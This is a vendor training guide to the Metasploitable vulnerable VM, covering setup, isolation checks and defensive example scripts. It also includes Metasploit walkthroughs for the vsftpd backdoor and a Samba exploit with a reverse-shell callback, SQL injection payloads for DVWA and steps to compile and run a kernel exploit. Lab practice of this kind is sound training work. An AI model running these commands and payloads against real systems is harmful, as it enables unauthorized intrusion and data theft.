Metasploitable is the most widely used intentionally vulnerable virtual machine for penetration testing training and security education. This comprehensive guide covers Metasploitable setup, vulnerability exploitation, training exercises, and how security professionals use Metasploitable for hands-on practice developing offensive security skills in a safe, legal environment.
What is Metasploitable?
Metasploitable is an intentionally vulnerable Linux-based virtual machine created by Rapid7 (the makers of the Metasploit Framework) specifically for security training. It contains dozens of deliberately insecure services, applications, and configurations, allowing aspiring penetration testers, security students, and ethical hackers to practice exploitation techniques without legal or ethical concerns.
Metasploitable serves as a safe target for learning offensive security skills, from basic reconnaissance and vulnerability scanning through exploitation, privilege escalation, and post-exploitation techniques. It is completely free, widely supported by security training materials, and used in courses from beginner to advanced levels, including OSCP preparation, CEH training, and university security programs.
Metasploitable Versions
| Version | OS | Released | Key Features |
|---|---|---|---|
| Metasploitable 2 | Ubuntu 8.04 | 2012 | 30+ vulnerabilities, most popular version |
| Metasploitable 3 (Linux) | Ubuntu 14.04 | 2016 | Modern vulnerabilities, realistic configurations |
| Metasploitable 3 (Windows) | Server 2008 R2 | 2016 | Windows-specific vulnerabilities, AD environment |
Setting Up Metasploitable
Requirements
- Virtualization Software: VMware Workstation/Fusion, VirtualBox, or Hyper-V
- Host OS: Windows, macOS, or Linux
- RAM: 2GB minimum (4GB+ recommended for attacker VM + Metasploitable)
- Disk Space: 8GB for Metasploitable 2, 20GB+ for Metasploitable 3
- Network: Host-only or internal network (isolated from internet)
Installing Metasploitable 2
- Download: Get Metasploitable 2 from SourceForge or the Rapid7 website (~800MB)
- Extract: Unzip the downloaded file to get the VM disk image
- Import to Virtualization Software: Create a new VM and attach the existing disk
- Network Configuration: Set the network adapter to Host-Only or Internal Network
- Start VM: Boot Metasploitable (auto-login or use msfadmin/msfadmin)
- Verify IP: Run `ifconfig` to note the IP address
```bash
# Default Metasploitable 2 credentials
# Username: msfadmin
# Password: msfadmin

# Check IP address
ifconfig

# Verify vulnerable services are running
netstat -tulpn
```
Installing Metasploitable 3
Metasploitable 3 requires building from source using Packer and Vagrant:
- Install Prerequisites: Packer, Vagrant, VirtualBox
- Clone Repository: `git clone https://github.com/rapid7/metasploitable3.git`
- Build VM: `./build.sh` (Linux/macOS) or `build.ps1` (Windows)
- Start VM: `vagrant up`
- Configure Network: Set to host-only networking
Network Isolation
Critical security practices when using Metasploitable:
- Host-Only Network: VMs communicate with the host only, not the internet
- Internal Network: VMs communicate with each other, not the host or the internet
- Snapshots: Take VM snapshot before testing for easy reset
- Firewall Rules: Ensure host firewall blocks VM internet access
- Never Bridge: Don't use bridged networking (exposes to LAN)
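A quick way to verify the isolation rules above before booting a lab is to read the VM's adapter configuration rather than trusting the GUI. The script below is an added example, not part of the original article or of the Metasploitable project: it parses the output of `VBoxManage showvminfo <vm> --machinereadable` and flags any adapter attached as bridged or NAT. The `nicN="..."` key format is assumed from VirtualBox's machine-readable output, and the sample output is constructed for this example.

```python
import re
import subprocess
import sys

# Constructed sample of `VBoxManage showvminfo <vm> --machinereadable` output.
# The nicN / bridgeadapterN / hostonlyadapterN key names follow VirtualBox's
# machine-readable format as understood here; treat them as an assumption.
SAMPLE_VMINFO = """name="Metasploitable2"
ostype="Ubuntu"
nic1="hostonly"
hostonlyadapter1="vboxnet0"
nic2="bridged"
bridgeadapter2="eth0"
nic3="none"
nic4="nat"
"""

# Attachment types that keep the VM off the internet and off the LAN.
# "none" is a disconnected adapter, which is also acceptable.
ALLOWED_ATTACHMENTS = {"hostonly", "intnet", "none"}


def parse_nics(vminfo: str) -> dict:
    """Map NIC index -> attachment type ("hostonly", "bridged", "nat", ...)."""
    nics = {}
    for line in vminfo.splitlines():
        m = re.match(r'^nic(\d+)="([^"]*)"$', line.strip())
        if m:
            nics[int(m.group(1))] = m.group(2)
    return nics


def isolation_violations(vminfo: str) -> list:
    """Return [(nic_index, attachment)] for every adapter that breaks isolation."""
    return sorted(
        (idx, kind)
        for idx, kind in parse_nics(vminfo).items()
        if kind not in ALLOWED_ATTACHMENTS
    )


def is_isolated(vminfo: str) -> bool:
    """True only when no adapter is bridged, NAT, or otherwise internet-facing."""
    return not isolation_violations(vminfo)


def check_vm(vm_name: str) -> list:
    """Query a real VM via VBoxManage (hypothetical usage; not run on the sample)."""
    out = subprocess.run(
        ["VBoxManage", "showvminfo", vm_name, "--machinereadable"],
        capture_output=True, text=True, check=True,
    ).stdout
    return isolation_violations(out)


if __name__ == "__main__":
    # With a VM name on the command line, check that VM; otherwise use the sample.
    if len(sys.argv) > 1:
        problems = check_vm(sys.argv[1])
    else:
        problems = isolation_violations(SAMPLE_VMINFO)
    for idx, kind in problems:
        print(f"nic{idx} is attached as '{kind}': change it to host-only or internal")
    if not problems:
        print("all adapters are host-only, internal, or disconnected")
```

Run it with the VM name as the only argument before each session; a non-empty list means the VM can reach the LAN or the internet and should not be started until the adapter is changed.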
Professional Penetration Testing Training
subrosa provides hands-on security training teaching practical penetration testing skills using vulnerable environments.
Metasploitable 2 Vulnerabilities
Network Services Vulnerabilities
| Service | Port | Vulnerability | Difficulty |
|---|---|---|---|
| FTP (vsftpd 2.3.4) | 21 | Backdoor command execution | Easy |
| SSH (OpenSSH) | 22 | Weak credentials, brute force | Easy |
| Telnet | 23 | Cleartext authentication | Easy |
| SMTP (Postfix) | 25 | User enumeration, open relay | Easy |
| HTTP (Apache) | 80 | Multiple web app vulnerabilities | Easy-Hard |
| Samba | 139, 445 | Multiple RCE vulnerabilities | Easy-Medium |
| MySQL | 3306 | Weak root password, no auth | Easy |
| PostgreSQL | 5432 | Weak authentication | Easy |
| VNC | 5900 | No authentication | Easy |
| Distcc | 3632 | Remote code execution | Easy |
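The table above is most useful as a checklist against what a scan actually reports. The following script is an added example (not code from the article or from Rapid7): it parses Nmap greppable output (`nmap -sV -oG scan.gnmap <ip>`), cross-references each open port against the table, and separates documented weak services from ports the table does not cover. The scan excerpt, host address and version banners are constructed for the example; the `port/state/proto/owner/service/rpcinfo/version/` field layout is Nmap's greppable format.

```python
import re

# Constructed sample of Nmap greppable output; host, ports and banners are made up.
SAMPLE_GNMAP = (
    "Host: 192.168.56.101 ()\tPorts: "
    "21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 4.7p1/, "
    "23/open/tcp//telnet//Linux telnetd/, "
    "3306/open/tcp//mysql//MySQL 5.0.51a/, "
    "5900/open/tcp//vnc//VNC (protocol 3.3)/, "
    "8180/open/tcp//http//Apache Tomcat (Coyote)/"
    "\tIgnored State: closed (994)\n"
)

# Reference table from this page: port -> (service, documented weakness).
KNOWN_WEAK = {
    21: ("FTP (vsftpd 2.3.4)", "Backdoor command execution"),
    22: ("SSH (OpenSSH)", "Weak credentials, brute force"),
    23: ("Telnet", "Cleartext authentication"),
    25: ("SMTP (Postfix)", "User enumeration, open relay"),
    80: ("HTTP (Apache)", "Multiple web app vulnerabilities"),
    139: ("Samba", "Multiple RCE vulnerabilities"),
    445: ("Samba", "Multiple RCE vulnerabilities"),
    3306: ("MySQL", "Weak root password, no auth"),
    3632: ("Distcc", "Remote code execution"),
    5432: ("PostgreSQL", "Weak authentication"),
    5900: ("VNC", "No authentication"),
}


def parse_greppable(text: str) -> list:
    """Parse 'Host: ... Ports: ...' lines into dicts, one per port entry.

    Each entry has the form port/state/proto/owner/service/rpcinfo/version/;
    the version field is kept whole even if it contains extra slashes.
    """
    entries = []
    for line in text.splitlines():
        m = re.match(r"^Host: (\S+) .*?\tPorts: ([^\t]+)", line)
        if not m:
            continue
        host, ports = m.groups()
        for raw in ports.split(", "):
            parts = raw.split("/")
            if len(parts) < 7:
                continue
            entries.append({
                "host": host,
                "port": int(parts[0]),
                "state": parts[1],
                "proto": parts[2],
                "service": parts[4],
                "version": "/".join(parts[6:]).rstrip("/"),
            })
    return entries


def match_known_weak(entries: list) -> list:
    """Open ports that appear in the page's table, with the banner Nmap saw."""
    return [
        (e["port"], e["version"], KNOWN_WEAK[e["port"]][1])
        for e in entries
        if e["state"] == "open" and e["port"] in KNOWN_WEAK
    ]


def unlisted_open_ports(entries: list) -> list:
    """Open ports the table does not cover: candidates for manual enumeration."""
    return sorted(
        e["port"] for e in entries
        if e["state"] == "open" and e["port"] not in KNOWN_WEAK
    )


if __name__ == "__main__":
    found = parse_greppable(SAMPLE_GNMAP)
    for port, banner, weakness in match_known_weak(found):
        print(f"{port:>5}  {banner:<28} {weakness}")
    print("not in table:", unlisted_open_ports(found))
```

Feeding a real `.gnmap` file to `parse_greppable` turns the table into a per-host inventory; the "not in table" list is where a learner should spend manual enumeration time, since the documented services are the known quantities.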
Web Application Vulnerabilities
Metasploitable 2 includes numerous vulnerable web applications:
- DVWA (Damn Vulnerable Web Application): SQL injection, XSS, CSRF, file upload
- Mutillidae: OWASP Top 10 vulnerabilities
- WebDAV: File upload and exploitation
- TWiki: Command injection
- phpMyAdmin: SQL injection, authentication bypass
Exploitation Walkthroughs
Example 1: vsftpd 2.3.4 Backdoor
One of the easiest exploits, demonstrating Metasploit Framework usage:
```text
# Start Metasploit
msfconsole
# Search for vsftpd exploit
search vsftpd
# Use the backdoor exploit
use exploit/unix/ftp/vsftpd_234_backdoor
# Set target IP
set RHOSTS 192.168.1.100
# Run exploit
exploit
# You now have root shell on Metasploitable!
```
Example 2: Samba Usermap Script
```text
# Use Samba exploit
use exploit/multi/samba/usermap_script
# Configure options
set RHOSTS 192.168.1.100
set PAYLOAD cmd/unix/reverse
# Set callback IP (your attack machine)
set LHOST 192.168.1.50
# Exploit
exploit
# Root shell obtained
```
Example 3: SQL Injection in DVWA
- Navigate to http://[metasploitable-ip]/dvwa/
- Log in with admin/password
- Set security to "Low"
- Go to the SQL Injection page
- Test injection: `1' OR '1'='1`
- Dump database: `1' UNION SELECT user,password FROM users#`
- Crack password hashes with John the Ripper or hashcat
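To see why the two payloads above work, and what stops them, it helps to run the same query shape outside DVWA. The snippet below is an added example, not DVWA's or the article's code: it builds a tiny in-memory SQLite table shaped like DVWA's `users` table, runs the "Low"-style string-concatenated query beside a parameterized version, and feeds both the page's payloads. The UNION payload's trailing `#` is MySQL comment syntax, so it is swapped for SQLite's `--` here; table rows and hashes are constructed.

```python
import sqlite3

DVWA_QUERY = "SELECT first_name, last_name FROM users WHERE user_id = "

# Constructed sample rows; the password column holds placeholder strings, not DVWA's hashes.
SAMPLE_ROWS = [
    (1, "admin", "admin", "admin", "hash-of-admin-password"),
    (2, "gordonb", "Gordon", "Brown", "hash-of-gordon-password"),
    (3, "pablo", "Pablo", "Picasso", "hash-of-pablo-password"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory table shaped like DVWA's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT, "
        "last_name TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, user_id: str) -> list:
    """DVWA 'Low' style: the input is pasted straight into the SQL string."""
    sql = DVWA_QUERY + "'" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id: str) -> list:
    """Hardened form: the value is bound as a parameter, never parsed as SQL."""
    return conn.execute(DVWA_QUERY + "?", (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Normal use: one user.
    print(lookup_vulnerable(db, "1"))
    # Tautology payload from the walkthrough: the WHERE clause is always true.
    print(lookup_vulnerable(db, "1' OR '1'='1"))
    # UNION payload with MySQL's '#' comment replaced by SQLite's '--'.
    print(lookup_vulnerable(db, "1' UNION SELECT user, password FROM users -- "))
    # The same inputs against the parameterized query match nothing.
    print(lookup_safe(db, "1' OR '1'='1"))
    print(lookup_safe(db, "1"))
```

The contrast is the whole lesson: the parameterized query treats `1' OR '1'='1` as a literal string that matches no `user_id`, while the concatenated query parses it as SQL. When DVWA's security level is raised, its code moves toward the second form; reading that source is the "Read Source Code" tip from the learning tips below in practice.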
Example 4: Privilege Escalation
```bash
# After getting a low-privilege shell
# Check kernel version
uname -a
# Search for local privilege escalation exploits
searchsploit linux kernel 2.6
# Download and compile exploit
gcc -o exploit exploit.c
# Run exploit
./exploit
# Root shell achieved!
```
Training Exercises
Beginner Exercises
- Network Scanning:
  - Use Nmap to discover open ports
  - Identify running services and versions
  - Perform OS fingerprinting
- Service Enumeration:
  - Enumerate SMB shares with smbclient
  - Enumerate users via the SMTP VRFY command
  - Identify web technologies with Nikto
- Basic Exploitation:
  - Exploit the vsftpd backdoor with Metasploit
  - Brute force SSH with Hydra
  - Access the unprotected VNC session
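A useful companion to the SSH brute-force exercise is to look at the same event from the target's side: Metasploitable's `/var/log/auth.log` records every failed and accepted password attempt, and a short detector over those lines shows what the Hydra run looks like to a defender. The script below is an added example, not part of the article: it parses OpenSSH `Failed password` / `Accepted password` lines, counts failures per source address inside a sliding time window, and notes whether a success followed the burst. The log excerpt, addresses and PIDs are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt in syslog/OpenSSH style; hosts, PIDs and times are made up.
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:01 metasploitable sshd[2301]: Failed password for msfadmin from 192.168.56.1 port 40100 ssh2
Mar  3 10:01:02 metasploitable sshd[2301]: Failed password for msfadmin from 192.168.56.1 port 40100 ssh2
Mar  3 10:01:02 metasploitable sshd[2303]: Failed password for invalid user root from 192.168.56.1 port 40102 ssh2
Mar  3 10:01:03 metasploitable sshd[2305]: Failed password for msfadmin from 192.168.56.1 port 40104 ssh2
Mar  3 10:01:04 metasploitable sshd[2307]: Failed password for user from 192.168.56.1 port 40106 ssh2
Mar  3 10:01:05 metasploitable sshd[2309]: Failed password for msfadmin from 192.168.56.1 port 40108 ssh2
Mar  3 10:01:06 metasploitable sshd[2311]: Accepted password for msfadmin from 192.168.56.1 port 40110 ssh2
Mar  3 10:15:00 metasploitable sshd[2400]: Failed password for msfadmin from 192.168.56.7 port 51000 ssh2
Mar  3 10:30:00 metasploitable sshd[2410]: Failed password for msfadmin from 192.168.56.7 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_auth_log(log: str) -> list:
    """Return (timestamp, result, user, ip) tuples for sshd password events."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            # Syslog timestamps carry no year; deltas within one log are still valid.
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            events.append((ts, m.group("result"), m.group("user"), m.group("ip")))
    return events


def detect_bruteforce(log: str, threshold: int = 5, window_seconds: int = 60) -> dict:
    """Source IPs with >= threshold failures inside any window_seconds span.

    Returns {ip: {"max_failures": n, "success_after": bool}}; success_after
    marks an 'Accepted password' from the same IP at or after its last failure,
    the trace a successful password-guessing run leaves behind.
    """
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ts, result, _user, ip in parse_auth_log(log):
        (failures if result == "Failed" else successes)[ip].append(ts)

    flagged = {}
    for ip, times in failures.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            last_failure = times[-1]
            flagged[ip] = {
                "max_failures": best,
                "success_after": any(t >= last_failure for t in successes[ip]),
            }
    return flagged


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

Pointing `parse_auth_log` at the real `auth.log` after running Hydra against the lab VM shows the burst and the final `Accepted password` in the same window; the two tunables, `threshold` and `window_seconds`, are the same knobs a production alert on this pattern would expose.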
Intermediate Exercises
- Web Application Testing:
  - Perform SQL injection in DVWA
  - Execute XSS attacks in Mutillidae
  - Upload a web shell via the file upload vulnerability
  - Exploit command injection in TWiki
- Manual Exploitation:
  - Exploit the Samba vulnerability without Metasploit
  - Write custom exploit scripts
  - Develop proof-of-concept exploits
- Post-Exploitation:
  - Enumerate system information
  - Dump password hashes
  - Establish persistence mechanisms
  - Practice lateral movement
Advanced Exercises
- Full Attack Chain:
  - Initial reconnaissance
  - Vulnerability identification
  - Exploitation
  - Privilege escalation
  - Maintain access
  - Cover tracks
- Custom Tool Development:
  - Write custom Metasploit modules
  - Develop automated exploitation scripts
  - Create payload encoders
- Reporting Practice:
  - Document all findings
  - Write a professional penetration test report
  - Provide remediation recommendations
Professional Penetration Testing Services
subrosa provides expert penetration testing services identifying real vulnerabilities in production environments.
Learning Resources
Recommended Tools
| Tool | Purpose | Use Case |
|---|---|---|
| Nmap | Network scanning | Port discovery, service enumeration |
| Metasploit | Exploitation framework | Automated exploitation, payload delivery |
| Burp Suite | Web app testing | Proxy, scanner, repeater |
| SQLmap | SQL injection | Automated SQL injection testing |
| Hydra | Password cracking | Brute force attacks |
| John the Ripper | Hash cracking | Password hash cracking |
| Nikto | Web server scanning | Web vulnerability scanning |
| Wireshark | Packet analysis | Network traffic inspection |
Online Courses Using Metasploitable
- Offensive Security (OSCP): Uses vulnerable VMs built on the same principles as Metasploitable
- Cybrary: Free courses covering Metasploitable exploitation
- Udemy: Multiple ethical hacking courses using Metasploitable
- PentesterLab: Hands-on exercises with vulnerable systems
- HackTheBox/TryHackMe: Similar vulnerable machines for practice
Beyond Metasploitable
Similar Training Platforms
| Platform | Type | Best For |
|---|---|---|
| HackTheBox | Online labs | Realistic CTF challenges |
| TryHackMe | Guided learning | Structured learning paths |
| VulnHub | Vulnerable VMs | Free downloadable challenges |
| DVWA | Web app | Web application security |
| WebGoat | Web app | OWASP vulnerabilities |
| bWAPP | Web app | 100+ web vulnerabilities |
| Pentester Lab | Online exercises | Hands-on exploitation practice |
Progression Path
- Start: Metasploitable 2 (basic vulnerabilities, guided tutorials)
- Intermediate: Metasploitable 3 (realistic configurations, modern vulnerabilities)
- Advanced: VulnHub machines (realistic scenarios, harder challenges)
- Expert: HackTheBox (community challenges, updated regularly)
- Professional: Real-world penetration testing engagements
Best Practices
Lab Safety
- Network Isolation: Never connect Metasploitable to the internet or production networks
- Host-Only Networking: Use isolated virtual networks only
- Snapshots: Take VM snapshots before major changes
- Regular Resets: Reset to clean state between exercises
- Documentation: Keep notes of what you learn
Learning Tips
- Understand Before Automating: Manually exploit vulnerabilities before using automated tools
- Read Source Code: Examine vulnerable application code to understand flaws
- Practice Reporting: Document findings professionally
- Try Multiple Paths: Exploit same vulnerability different ways
- Research Deeply: Understand why vulnerabilities exist and how to prevent them
Ethical Considerations
- Only practice on systems you own or have explicit permission to test
- Never use learned techniques against unauthorized targets
- Understand legal implications of hacking
- Follow responsible disclosure for real vulnerabilities discovered
- Use skills to improve security, not cause harm
Frequently Asked Questions
What is Metasploitable?
Metasploitable is an intentionally vulnerable Linux virtual machine created by Rapid7 for security training and penetration testing practice. It contains dozens of deliberately insecure services, applications, and configurations, allowing security professionals, students, and ethical hackers to practice exploitation techniques in a safe, legal environment. Current versions include Metasploitable 2 (Ubuntu 8.04 with 30+ vulnerabilities) and Metasploitable 3 (Windows Server 2008 and Ubuntu 14.04 with modern vulnerabilities). Metasploitable is completely free, widely used in security training courses, and provides hands-on experience with real-world vulnerabilities without the risk of legal issues or production system damage.
Is Metasploitable legal to use?
Yes, Metasploitable is completely legal when used properly in isolated lab environments for security training and testing. It was specifically created by Rapid7 for this purpose and is freely distributed. However, legal use requires: (1) only testing on your own systems or systems you have explicit authorization to test; (2) never exposing Metasploitable to the internet or production networks; (3) using host-only or internal networking for complete isolation; (4) never using learned techniques against unauthorized targets; (5) understanding that unauthorized hacking is illegal regardless of the tools used. Metasploitable provides a safe, legal way to learn offensive security skills, but those skills must only be applied ethically and legally.
What's the difference between Metasploitable 2 and 3?
Metasploitable 2 (released 2012) is an Ubuntu 8.04 virtual machine with 30+ deliberately vulnerable services, including the vsftpd backdoor, Samba exploits, SQL injection, weak credentials, and outdated web applications; it is ideal for beginners learning basic exploitation. Metasploitable 3 (released 2016) includes both Linux (Ubuntu 14.04) and Windows (Server 2008 R2) versions with more realistic, modern vulnerabilities, including web application flaws, Windows Active Directory misconfigurations, and contemporary exploits; it is better suited to intermediate learners. Metasploitable 3 requires building from source using Packer/Vagrant, while Metasploitable 2 downloads as a ready-to-use VM image. Most beginners start with Metasploitable 2 for its simplicity and extensive online tutorials.
Can I run Metasploitable on VirtualBox?
Yes, Metasploitable runs perfectly on VirtualBox, which is free virtualization software available for Windows, macOS, and Linux. Download Metasploitable 2 as a .vmdk disk image, create a new VM in VirtualBox, attach the disk, configure host-only networking for isolation, and start the VM. Default credentials are msfadmin/msfadmin. For Metasploitable 3, use Vagrant with the VirtualBox provider, following the build instructions from the GitHub repository. VirtualBox is actually the recommended platform for beginners because it is free and cross-platform. Key requirement: configure the network adapter as Host-Only or Internal Network (never Bridged) to ensure complete isolation from the internet and the local network.
What can I learn from Metasploitable?
Metasploitable teaches comprehensive offensive security skills: (1) reconnaissance: network scanning with Nmap, service enumeration, OS fingerprinting; (2) vulnerability identification: discovering vulnerabilities through manual testing and automated scanning; (3) exploitation: using the Metasploit Framework, manual exploitation, developing custom exploits; (4) web application security: SQL injection, XSS, CSRF, file upload vulnerabilities, authentication bypass; (5) privilege escalation: local exploits, kernel vulnerabilities, configuration weaknesses; (6) post-exploitation: maintaining access, data exfiltration, lateral movement; (7) password cracking: hash extraction, John the Ripper, brute forcing; (8) reporting: documenting findings professionally for penetration test reports. It is an essential foundation for certifications like OSCP, CEH, and GPEN.
Do I need Kali Linux to use Metasploitable?
While Kali Linux is recommended and most convenient (it includes all necessary tools pre-installed), you don't strictly need it. Metasploitable can be attacked from any operating system with penetration testing tools installed: Windows with WSL and security tools, macOS with Homebrew-installed tools, or any Linux distribution with tools installed manually. However, Kali Linux (or Parrot OS) provides significant advantages: pre-installed Metasploit Framework, Nmap, Burp Suite, SQLmap, Hydra, and 600+ other security tools; a configuration optimized for penetration testing; extensive documentation and community support; and it runs well in VirtualBox alongside Metasploitable. Most training materials assume Kali Linux, making it the easiest choice for beginners.
How do I reset Metasploitable after exploiting it?
Reset Metasploitable using virtual machine snapshots or restore from a backup: (1) take a snapshot before starting a practice session using the VM software's snapshot feature; (2) after completing exercises, power off Metasploitable; (3) restore the clean snapshot through the VM manager; (4) start the VM fresh for the next session. Alternatively, keep the original .vmdk file as a backup and copy it when a reset is needed. For Metasploitable 3 built with Vagrant, run `vagrant destroy` then `vagrant up` to rebuild from scratch. Regular resets prevent issues from accumulated exploits, maintain a consistent starting state for practice, and allow repeating the same exercises multiple times. Best practice: take multiple snapshots at different states (clean install, after basic config, etc.) for flexibility.
What certifications prepare you for using Metasploitable?
Metasploitable helps prepare for offensive security certifications: OSCP (Offensive Security Certified Professional), a hands-on exam requiring exploitation of vulnerable machines similar to Metasploitable; CEH (Certified Ethical Hacker), which covers tools and techniques practiced on Metasploitable; GPEN (GIAC Penetration Tester), practical penetration testing skills including exploitation; eJPT (eLearnSecurity Junior Penetration Tester), a beginner certification using vulnerable labs; CompTIA PenTest+, a vendor-neutral penetration testing certification. Metasploitable provides essential hands-on practice for these exams, particularly OSCP, which requires demonstrating exploitation skills in a timed practical exam. Practice on Metasploitable builds confidence and muscle memory for certification exams.
Can Metasploitable be used for CTF practice?
Yes, Metasploitable provides excellent Capture The Flag (CTF) practice for jeopardy-style competitions focusing on exploitation challenges. While not specifically designed as a CTF platform, Metasploitable's vulnerable services and applications map well to common CTF categories: pwn (exploitation challenges using vulnerable services), web (SQL injection, XSS, file upload in DVWA/Mutillidae), crypto (cracking password hashes), forensics (analyzing artifacts on the exploited system), and reverse engineering (examining vulnerable applications). However, dedicated CTF platforms like HackTheBox, TryHackMe, and CTFtime provide more CTF-specific challenges with flags, scoring, and competitive elements. Use Metasploitable to build fundamental exploitation skills, then progress to CTF platforms for competition-style challenges and more realistic scenarios.
Should I learn Metasploitable before real penetration testing?
Absolutely, Metasploitable is an essential training ground before attempting real-world penetration testing. It provides a safe environment to: (1) learn tools without production system risk; (2) practice exploitation techniques legally and ethically; (3) understand vulnerability mechanics deeply; (4) make mistakes without consequences; (5) build confidence before client engagements; (6) develop muscle memory for common tasks. Professional penetration testers typically progress: foundational training on Metasploitable and similar platforms → certifications (OSCP, CEH) → junior role with supervision → independent testing. Never attempt unauthorized testing on production systems; the legal and career consequences are severe. Metasploitable and similar platforms provide a path from beginner to professional without legal risk. subrosa provides professional penetration testing services when you need an expert assessment of production environments.
Conclusion
Metasploitable represents an essential training resource for aspiring penetration testers, security students, and anyone developing offensive security skills. Its intentionally vulnerable design provides a safe, legal environment to practice the reconnaissance, exploitation, privilege escalation, and post-exploitation techniques foundational to professional penetration testing, without the risk of legal issues or production system damage.
Starting with Metasploitable 2's basic vulnerabilities and progressing through Metasploitable 3's realistic configurations provides a structured learning path from beginner to intermediate offensive security skills. Combined with proper documentation practice, ethical considerations, and complementary training resources, Metasploitable experience prepares security professionals for certifications like OSCP, real-world penetration testing engagements, and defensive security roles that require understanding attacker methodologies.
Remember that skills learned through Metasploitable carry significant responsibility: use offensive security knowledge exclusively for authorized testing, improving security defenses, and protecting organizations from real threats. Never apply these techniques against unauthorized targets, always maintain ethical standards, and consider how offensive skills contribute to the broader cybersecurity mission of protecting systems and data.
subrosa provides professional penetration testing services delivering expert security assessments of production environments, and security training programs teaching offensive and defensive skills through hands-on exercises, vulnerable environments, and real-world scenarios that prepare teams for the modern threat landscape.